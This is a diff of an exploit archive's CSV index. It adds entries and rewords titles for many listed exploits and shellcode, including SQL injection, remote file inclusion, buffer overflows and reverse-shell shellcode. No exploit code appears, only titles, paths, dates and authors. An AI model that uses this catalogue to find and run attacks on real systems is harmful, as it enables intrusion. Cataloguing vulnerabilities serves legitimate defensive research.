 18780,platforms/windows/remote/18780.rb,"Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)",2012-04-25,Metasploit,windows,remote,0
@ -15023,6 +15030,7 @@ id,file,description,date,author,platform,type,port
 40113,platforms/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (1)",2016-07-18,"Eddie Harari",linux,remote,22
 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0
 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0
 40846,platforms/android/remote/40846.html,"Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote,0
 40125,platforms/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String",2016-07-19,bashis,multiple,remote,0
 40130,platforms/php/remote/40130.rb,"Drupal Module RESTWS 7.x - Remote PHP Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80
 40136,platforms/linux/remote/40136.py,"OpenSSHd 7.2p2 - Username Enumeration (2)",2016-07-20,0_o,linux,remote,22
@ -15098,6 +15106,12 @@ id,file,description,date,author,platform,type,port
 40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80
 40813,platforms/hardware/remote/40813.txt,"Crestron AM-100 - Multiple Vulnerabilities",2016-11-22,"Zach Lanier",hardware,remote,0
 40824,platforms/multiple/remote/40824.py,"GNU Wget < 1.18 - Access List Bypass / Race Condition",2016-11-24,"Dawid Golunski",multiple,remote,80
 40830,platforms/windows/remote/40830.py,"VX Search Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40831,platforms/windows/remote/40831.py,"Sync Breeze Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40833,platforms/windows/remote/40833.py,"Disk Sorter Enterprise 9.1.12 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40832,platforms/windows/remote/40832.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40834,platforms/windows/remote/40834.py,"Disk Savvy Enterprise 9.1.14 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 40835,platforms/windows/remote/40835.py,"Disk Pulse Enterprise 9.1.16 - Buffer Overflow",2016-11-28,Tulpa,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -15553,7 +15567,7 @@ id,file,description,date,author,platform,type,port
 40387,platforms/hardware/shellcode/40387.nasm,"Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",hardware,shellcode,0
 27132,platforms/hardware/shellcode/27132.txt,"MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",hardware,shellcode,0
 27180,platforms/arm/shellcode/27180.asm,"Windows RT ARM - Bind Shell (Port 4444) Shellcode",2013-07-28,"Matthew Graeber",arm,shellcode,0
-40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (25 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
+40827,platforms/lin_x86/shellcode/40827.c,"Linux/x86 - Egg-hunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",lin_x86,shellcode,0
 28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0
 40334,platforms/win_x86/shellcode/40334.c,"Windows x86 - Persistent Reverse Shell TCP (494 Bytes)",2016-09-05,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 28996,platforms/windows/shellcode/28996.c,"Windows - Messagebox Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",windows,shellcode,0
@ -15934,7 +15948,7 @@ id,file,description,date,author,platform,type,port
 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0
 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0
-1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
+1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0
 1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0
 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0
 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0
@ -16201,7 +16215,7 @@ id,file,description,date,author,platform,type,port
 1914,platforms/php/webapps/1914.txt,"Content-Builder (CMS) 0.7.2 - Multiple Include Vulnerabilities",2006-06-14,Kacper,php,webapps,0
 1916,platforms/php/webapps/1916.txt,"DeluxeBB 1.06 - 'templatefolder' Parameter Remote File Inclusion",2006-06-15,"Andreas Sandblad",php,webapps,0
 1918,platforms/php/webapps/1918.php,"Bitweaver 1.3 - (tmpImagePath) Attachment mod_mime Exploit",2006-06-15,rgod,php,webapps,0
-1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - (mainpath) Remote File Inclusion",2006-06-16,K-159,php,webapps,0
+1919,platforms/php/webapps/1919.txt,"CMS Faethon 1.3.2 - 'mainpath' Parameter Remote File Inclusion",2006-06-16,K-159,php,webapps,0
 1920,platforms/php/webapps/1920.php,"Mambo 4.6rc1 - (Weblinks) Blind SQL Injection (1)",2006-06-17,rgod,php,webapps,0
 1921,platforms/php/webapps/1921.pl,"FlashBB 1.1.8 - 'phpbb_root_path' Remote File Inclusion",2006-06-17,h4ntu,php,webapps,0
 1922,platforms/php/webapps/1922.php,"Joomla! 1.0.9 - (Weblinks) Blind SQL Injection",2006-06-17,rgod,php,webapps,0
@ -16736,7 +16750,7 @@ id,file,description,date,author,platform,type,port
 2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - (includes/functions.php) Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0
 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - (lib.editor.inc.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0
 2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - (embedded.php) File Inclusion",2006-10-24,Kacper,php,webapps,0
-2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - (mainpath) Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0
+2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Parameter Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0
 2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - (login/secure.php) Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0
 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0
 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Topic Reply Command Execution",2006-10-24,BlackHawk,php,webapps,0
@ -16796,13 +16810,13 @@ id,file,description,date,author,platform,type,port
 2713,platforms/php/webapps/2713.txt,"Drake CMS < 0.2.3 ALPHA rev.916 - Remote File Inclusion",2006-11-04,GregStar,php,webapps,0
 2714,platforms/php/webapps/2714.pl,"PHPKIT 1.6.1R2 - (search_user) SQL Injection",2006-11-04,x23,php,webapps,0
 2717,platforms/php/webapps/2717.txt,"phpDynaSite 3.2.2 - (racine) Remote File Inclusion",2006-11-04,DeltahackingTEAM,php,webapps,0
-2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - (cart.php) Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
+2718,platforms/php/webapps/2718.txt,"SazCart 1.5 - 'cart.php' Remote File Inclusion",2006-11-04,IbnuSina,php,webapps,0
 2719,platforms/php/webapps/2719.php,"Quick.CMS.Lite 0.3 - (Cookie sLanguage) Local File Inclusion",2006-11-05,Kacper,php,webapps,0
 2720,platforms/php/webapps/2720.pl,"PHP Classifieds 7.1 - 'detail.php' SQL Injection",2006-11-05,ajann,php,webapps,0
 2721,platforms/php/webapps/2721.php,"Ultimate PHP Board 2.0 - (header_simple.php) File Inclusion",2006-11-05,Kacper,php,webapps,0
 2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - 'message_details.php' SQL Injection",2006-11-05,Bl0od3r,php,webapps,0
 2724,platforms/php/webapps/2724.txt,"Soholaunch Pro 4.9 r36 - Remote File Inclusion",2006-11-06,the_day,php,webapps,0
-2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - (av) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
+2725,platforms/php/webapps/2725.txt,"Cyberfolio 2.0 RC1 - 'av' Parameter Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - (MysqlfinderAdmin.php) Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - (srcdir) Multiple Remote File Inclusion",2006-11-06,the_day,php,webapps,0
 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection (1)",2006-11-06,Liz0ziM,php,webapps,0
@ -16873,7 +16887,7 @@ id,file,description,date,author,platform,type,port
 2823,platforms/php/webapps/2823.txt,"aBitWhizzy - 'abitwhizzy.php' Information Disclosure",2006-11-21,"Security Access Point",php,webapps,0
 2826,platforms/php/webapps/2826.txt,"Pearl Forums 2.4 - Multiple Remote File Inclusion",2006-11-21,3l3ctric-Cracker,php,webapps,0
 2827,platforms/php/webapps/2827.txt,"phpPC 1.04 - Multiple Remote File Inclusion",2006-11-21,iss4m,php,webapps,0
-2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - (index.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
+2828,platforms/asp/webapps/2828.pl,"FipsCMS 4.5 - 'index.asp' SQL Injection",2006-11-22,ajann,asp,webapps,0
 2829,platforms/asp/webapps/2829.txt,"fipsGallery 1.5 - (index1.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
 2830,platforms/asp/webapps/2830.txt,"fipsForum 2.6 - (default2.asp) SQL Injection",2006-11-22,ajann,asp,webapps,0
 2831,platforms/php/webapps/2831.txt,"a-ConMan 3.2b - 'common.inc.php' Remote File Inclusion",2006-11-22,Matdhule,php,webapps,0
@ -17236,7 +17250,7 @@ id,file,description,date,author,platform,type,port
 3406,platforms/php/webapps/3406.pl,"News-Letterman 1.1 - (eintrag.php sqllog) Remote File Inclusion",2007-03-04,bd0rk,php,webapps,0
 3408,platforms/php/webapps/3408.pl,"AJ Auction Pro - 'subcat.php' SQL Injection",2007-03-04,ajann,php,webapps,0
 3409,platforms/php/webapps/3409.htm,"AJ Dating 1.0 - (view_profile.php) SQL Injection",2007-03-04,ajann,php,webapps,0
-3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - (postingdetails.php) SQL Injection",2007-03-04,ajann,php,webapps,0
+3410,platforms/php/webapps/3410.htm,"AJ Classifieds 1.0 - 'postingdetails.php' SQL Injection",2007-03-04,ajann,php,webapps,0
 3411,platforms/php/webapps/3411.pl,"AJ Forum 1.0 - (topic_title.php) SQL Injection",2007-03-04,ajann,php,webapps,0
 3412,platforms/cgi/webapps/3412.txt,"RRDBrowse 1.6 - Arbitrary File Disclosure",2007-03-04,"Sebastian Wolfgarten",cgi,webapps,0
 3416,platforms/php/webapps/3416.pl,"Links Management Application 1.0 - (lcnt) SQL Injection",2007-03-05,ajann,php,webapps,0
@ -17510,7 +17524,7 @@ id,file,description,date,author,platform,type,port
 3847,platforms/php/webapps/3847.txt,"Versado CMS 1.07 - (ajax_listado.php urlModulo) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
 3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0
-3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection",2007-05-04,rgod,php,webapps,0
+3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - 'debug_show.php' SQL Injection",2007-05-04,rgod,php,webapps,0
 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0
 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0
 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a - (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0
@ -17835,7 +17849,7 @@ id,file,description,date,author,platform,type,port
 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0
 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0
 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 - Remote File Inclusion",2007-09-19,BiNgZa,php,webapps,0
-4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - (userreviews.php abc) SQL Injection",2007-09-19,str0ke,php,webapps,0
+4433,platforms/php/webapps/4433.pl,"OneCMS 2.4 - 'abc' Parameter SQL Injection",2007-09-19,str0ke,php,webapps,0
 4434,platforms/php/webapps/4434.txt,"phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion",2007-09-20,Mehrad,php,webapps,0
 4435,platforms/php/webapps/4435.pl,"Flip 3.0 - Remote Admin Creation Exploit",2007-09-20,undefined1_,php,webapps,0
 4436,platforms/php/webapps/4436.pl,"Flip 3.0 - Remote Password Hash Disclosure",2007-09-20,undefined1_,php,webapps,0
@ -17995,7 +18009,7 @@ id,file,description,date,author,platform,type,port
 4654,platforms/php/webapps/4654.txt,"PBLang 4.99.17.q - Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
 4655,platforms/php/webapps/4655.txt,"project alumni 1.0.9 - Cross-Site Scripting / SQL Injection",2007-11-24,tomplixsee,php,webapps,0
 4656,platforms/php/webapps/4656.txt,"RunCMS 1.6 - Local File Inclusion",2007-11-24,BugReport.IR,php,webapps,0
-4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - disclaimer.php Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
+4658,platforms/php/webapps/4658.php,"RunCMS 1.6 - 'disclaimer.php' Remote File Overwrite",2007-11-25,BugReport.IR,php,webapps,0
 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion",2007-11-25,ShAy6oOoN,php,webapps,0
 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - SQL Injection",2007-11-25,"Khashayar Fereidani",php,webapps,0
 4661,platforms/php/webapps/4661.py,"DeluxeBB 1.09 - Remote Admin Email Change",2007-11-26,nexen,php,webapps,0
@ -18648,39 +18662,39 @@ id,file,description,date,author,platform,type,port
 5549,platforms/php/webapps/5549.txt,"Power Editor 2.0 - Remote File Disclosure / Edit",2008-05-05,"Virangar Security",php,webapps,0
 5550,platforms/php/webapps/5550.php,"DeluxeBB 1.2 - Multiple Vulnerabilities",2008-05-05,EgiX,php,webapps,0
 5551,platforms/php/webapps/5551.txt,"Pre Shopping Mall 1.1 - 'search.php' SQL Injection",2008-05-06,t0pP8uZz,php,webapps,0
-5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' SQL Injection",2008-05-06,InjEctOr5,php,webapps,0
+5552,platforms/php/webapps/5552.txt,"PHPEasyData 1.5.4 - 'cat_id' Parameter SQL Injection",2008-05-06,InjEctOr5,php,webapps,0
-5553,platforms/asp/webapps/5553.txt,"FipsCMS - 'print.asp lg' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
+5553,platforms/asp/webapps/5553.txt,"FipsCMS 2.1 - 'print.asp' SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
-5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - (index.php cat) SQL Injection",2008-05-07,cOndemned,php,webapps,0
+5554,platforms/php/webapps/5554.php,"Galleristic 1.0 - 'cat' Parameter SQL Injection",2008-05-07,cOndemned,php,webapps,0
-5555,platforms/php/webapps/5555.txt,"gameCMS Lite 1.0 - (index.php systemId) SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
+5555,platforms/php/webapps/5555.txt,"GameCMS Lite 1.0 - 'systemId' Parameter SQL Injection",2008-05-07,InjEctOr5,php,webapps,0
 5556,platforms/asp/webapps/5556.txt,"PostcardMentor - 'cat_fldAuto' Parameter SQL Injection",2008-05-07,InjEctOr5,asp,webapps,0
 5557,platforms/php/webapps/5557.pl,"OneCMS 2.5 - Blind SQL Injection",2008-05-07,Cod3rZ,php,webapps,0
-5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - (Remote File Inclusion / Cross-Site Scripting) Multiple Remote Vulnerabilities",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
+5558,platforms/php/webapps/5558.txt,"CMS Faethon 2.2 Ultimate - Remote File Inclusion / Cross-Site Scripting",2008-05-07,RoMaNcYxHaCkEr,php,webapps,0
 5559,platforms/php/webapps/5559.txt,"EZContents CMS 2.0.0 - Multiple SQL Injections",2008-05-07,"Virangar Security",php,webapps,0
-5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - (artistId) SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0
+5560,platforms/php/webapps/5560.txt,"MusicBox 2.3.7 - 'artistId' Parameter SQL Injection",2008-05-07,HaCkeR_EgY,php,webapps,0
-5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - (msg_image) SQL Injection",2008-05-08,The:Paradox,php,webapps,0
+5562,platforms/php/webapps/5562.py,"RunCMS 1.6.1 - 'msg_image' Parameter SQL Injection",2008-05-08,The:Paradox,php,webapps,0
 5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple SQL Injections",2008-05-08,U238,asp,webapps,0
-5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - (tid) SQL Injection",2008-05-08,Saime,php,webapps,0
+5565,platforms/php/webapps/5565.pl,"vShare YouTube Clone 2.6 - 'tid' Parameter SQL Injection",2008-05-08,Saime,php,webapps,0
 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
-5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
+5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - 'rep' Parameter Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
-5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - (del.php) Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0
+5568,platforms/php/webapps/5568.txt,"miniBloggie 1.0 - 'del.php' Arbitrary Delete Post",2008-05-08,Cod3rZ,php,webapps,0
 5575,platforms/php/webapps/5575.txt,"Admidio 1.4.8 - 'getfile.php' Remote File Disclosure",2008-05-09,n3v3rh00d,php,webapps,0
-5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - (prodid) SQL Injection",2008-05-09,JosS,php,webapps,0
+5576,platforms/php/webapps/5576.pl,"SazCart 1.5.1 - 'prodid' Parameter SQL Injection",2008-05-09,JosS,php,webapps,0
 5577,platforms/php/webapps/5577.txt,"HispaH Model Search - 'cat.php cat' SQL Injection",2008-05-09,InjEctOr5,php,webapps,0
-5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - (SQL Injection / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-09,tw8,php,webapps,0
+5578,platforms/php/webapps/5578.txt,"Phoenix View CMS Pre Alpha2 - SQL Injection / Local File Inclusion / Cross-Site Scripting",2008-05-09,tw8,php,webapps,0
 5579,platforms/php/webapps/5579.htm,"txtCMS 0.3 - 'index.php' Local File Inclusion",2008-05-09,cOndemned,php,webapps,0
-5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - (gallery.php gid) SQL Injection",2008-05-09,Mr.SQL,php,webapps,0
+5580,platforms/php/webapps/5580.txt,"Ktools Photostore 3.5.1 - 'gid' Parameter SQL Injection",2008-05-09,Mr.SQL,php,webapps,0
 5581,platforms/php/webapps/5581.txt,"Advanced Links Management (ALM) 1.52 - SQL Injection",2008-05-10,His0k4,php,webapps,0
 5582,platforms/php/webapps/5582.txt,"Ktools Photostore 3.5.2 - Multiple SQL Injections",2008-05-10,DNX,php,webapps,0
-5583,platforms/php/webapps/5583.php,"Joomla! Component com_datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0
+5583,platforms/php/webapps/5583.php,"Joomla! Component Datsogallery 1.6 - Blind SQL Injection",2008-05-10,+toxa+,php,webapps,0
 5586,platforms/php/webapps/5586.txt,"PhpBlock a8.5 - Multiple Remote File Inclusion",2008-05-11,CraCkEr,php,webapps,0
 5587,platforms/php/webapps/5587.pl,"Joomla! Component xsstream-dm 0.01b - SQL Injection",2008-05-11,Houssamix,php,webapps,0
 5588,platforms/php/webapps/5588.php,"QuickUpCMS - Multiple SQL Injections Vulnerabilities",2008-05-11,Lidloses_Auge,php,webapps,0
-5589,platforms/php/webapps/5589.php,"Vortex CMS - 'index.php pageid' Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0
+5589,platforms/php/webapps/5589.php,"Vortex CMS - 'pageid' Parameter Blind SQL Injection",2008-05-11,Lidloses_Auge,php,webapps,0
-5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - (featured_article.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
+5590,platforms/php/webapps/5590.txt,"AJ Article 1.0 - 'featured_article.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
-5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - (classifide_ad.php) SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
+5591,platforms/php/webapps/5591.txt,"AJ Auction 6.2.1 - 'classifide_ad.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
 5592,platforms/php/webapps/5592.txt,"AJ Classifieds 2008 - 'index.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
 5594,platforms/php/webapps/5594.txt,"ZeusCart 2.0 - 'category_list.php' SQL Injection",2008-05-12,t0pP8uZz,php,webapps,0
-5595,platforms/php/webapps/5595.txt,"clanlite 2.x - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-12,ZoRLu,php,webapps,0
+5595,platforms/php/webapps/5595.txt,"ClanLite 2.x - SQL Injection / Cross-Site Scripting",2008-05-12,ZoRLu,php,webapps,0
 5596,platforms/php/webapps/5596.txt,"BigACE 2.4 - Multiple Remote File Inclusion",2008-05-12,BiNgZa,php,webapps,0
 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script 1.5.x - SQL Injection",2008-05-12,Stack,php,webapps,0
 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 - (fid) SQL Injection",2008-05-12,TurkishWarriorr,php,webapps,0
@ -18748,7 +18762,7 @@ id,file,description,date,author,platform,type,port
 5665,platforms/php/webapps/5665.txt,"Netbutikker 4 - SQL Injection",2008-05-21,Mr.SQL,php,webapps,0
 5666,platforms/php/webapps/5666.txt,"e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection",2008-05-22,"Virangar Security",php,webapps,0
 5668,platforms/php/webapps/5668.txt,"Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities",2008-05-23,DSecRG,php,webapps,0
-5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - (install_mod.php) Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
+5669,platforms/php/webapps/5669.txt,"OneCMS 2.5 - 'install_mod.php' Local File Inclusion",2008-05-23,DSecRG,php,webapps,0
 5670,platforms/php/webapps/5670.txt,"RoomPHPlanning 1.5 - (idresa) SQL Injection",2008-05-24,His0k4,php,webapps,0
 5671,platforms/php/webapps/5671.txt,"PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion",2008-05-24,Kacak,php,webapps,0
 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion",2008-05-25,DR.TOXIC,php,webapps,0
@ -18912,8 +18926,8 @@ id,file,description,date,author,platform,type,port
 5864,platforms/php/webapps/5864.txt,"Orlando CMS 0.6 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
 5865,platforms/php/webapps/5865.txt,"CaupoShop Classic 1.3 - (saArticle[ID]) SQL Injection",2008-06-19,anonymous,php,webapps,0
 5866,platforms/php/webapps/5866.txt,"Lotus Core CMS 1.0.1 - Remote File Inclusion",2008-06-19,Ciph3r,php,webapps,0
-5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - (cate_id) SQL Injection",2008-06-19,"Hussin X",php,webapps,0
+5867,platforms/php/webapps/5867.txt,"AJ Auction Web 2.0 - 'cate_id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0
-5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' SQL Injection",2008-06-19,"Hussin X",php,webapps,0
+5868,platforms/php/webapps/5868.txt,"AJ Auction 1.0 - 'id' Parameter SQL Injection",2008-06-19,"Hussin X",php,webapps,0
 5869,platforms/php/webapps/5869.txt,"Virtual Support Office XP 3.0.29 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
 5870,platforms/php/webapps/5870.txt,"GL-SH Deaf Forum 6.5.5 - Multiple Vulnerabilities",2008-06-20,BugReport.IR,php,webapps,0
 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0
@ -19135,7 +19149,7 @@ id,file,description,date,author,platform,type,port
 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
 6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
 6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0
-6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - (r) SQL Injection",2008-07-26,U238,asp,webapps,0
+6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
 6136,platforms/php/webapps/6136.txt,"phpWebNews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0
 6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
@ -19425,7 +19439,7 @@ id,file,description,date,author,platform,type,port
 6546,platforms/php/webapps/6546.pl,"Rianxosencabos CMS 0.9 - Remote Add Admin",2008-09-24,ka0x,php,webapps,0
 6547,platforms/php/webapps/6547.txt,"Ol BookMarks Manager 0.7.5 - Remote File Inclusion / Local File Inclusion / SQL Injection",2008-09-24,GoLd_M,php,webapps,0
 6549,platforms/php/webapps/6549.txt,"Jetik Emlak ESA 2.0 - Multiple SQL Injections",2008-09-24,ZoRLu,php,webapps,0
-6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'detail.php item_id' SQL Injection",2008-09-24,GoLd_M,php,webapps,0
+6550,platforms/php/webapps/6550.txt,"AJ Auction Pro Platinum Skin - 'item_id' Parameter SQL Injection",2008-09-24,GoLd_M,php,webapps,0
 6551,platforms/php/webapps/6551.txt,"emergecolab 1.0 - (sitecode) Local File Inclusion",2008-09-24,dun,php,webapps,0
 6552,platforms/php/webapps/6552.txt,"mailwatch 1.0.4 - (docs.php doc) Local File Inclusion",2008-09-24,dun,php,webapps,0
